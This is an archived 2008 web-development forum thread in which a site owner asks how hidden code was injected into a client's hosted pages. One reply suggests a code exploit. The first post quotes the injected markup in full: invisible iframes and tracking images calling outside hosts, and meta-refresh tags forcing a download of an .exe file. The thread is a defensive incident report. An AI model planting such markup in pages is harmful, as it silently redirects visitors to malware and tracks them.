michaellunsford Posted September 14, 2008 Share Posted September 14, 2008 I occasionally check clients websites to make sure they're working. Today, I discovered on one that about three weeks ago there are a bunch of iframes below the closing </html> tag. First off, where does this stuff come from? This is hosted with a yahoo small business account and hasn't been logged into or changed since 2005 -- so it's not someone packet sniffing. The ftp password is not a random accumulation of characters (which has been my practice of late) but it's certainly not anything in a dictionary. Not that this is terribly important, as I'm getting ready to migrate the hosting to my own dedicated server (which has ftp disabled). I just wonder aloud how in the world people do this? <iframe width=0 height=0 frameborder=0 src="http://xoads.com/ads.php?usr=urbk" marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe><img src="http://whos.amung.us/swidget/borradov.png" width=0 height=0 ><img src="http://whos.amung.us/swidget/borradov.png" width=0 height=0 ><img src="http://whos.amung.us/swidget/borradov.png" width=0 height=0 ><iframe width=0 height=0 frameborder=0 src="http://xoads.com/ads.php?usr=urbk" marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe><iframe width=0 height=0 frameborder=0 src="http://xoads.com/ads.php?usr=urbk" marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe><META HTTP-EQUIV=Refresh CONTENT="0; URL=http://www.chicasencam.com/acceso-webcams.exe"> <META HTTP-EQUIV=Refresh CONTENT="0; URL=http://www.chicasencam.com/acceso-webcams.exe"> <META HTTP-EQUIV=Refresh CONTENT="0; URL=http://www.chicasencam.com/acceso-webcams.exe"> <META HTTP-EQUIV=Refresh CONTENT="0; URL=http://www.chicasencam.com/acceso-webcams.exe"> Link to comment https://forums.phpfreaks.com/topic/124219-iframe-hacks-how-do-they-do-it/ Share on other sites More sharing options...
wildteen88 Posted September 14, 2008 Share Posted September 14, 2008 There could be an exploit within your code somewhere which is allowing the attacker to inject the HTML Link to comment https://forums.phpfreaks.com/topic/124219-iframe-hacks-how-do-they-do-it/#findComment-641431 Share on other sites More sharing options...
michaellunsford Posted September 14, 2008 Author Share Posted September 14, 2008 What kind of exploit could someone inject html into a document remotely? These aren't mysql injections, the actual HTML documents have been overwritten. Link to comment https://forums.phpfreaks.com/topic/124219-iframe-hacks-how-do-they-do-it/#findComment-641441 Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.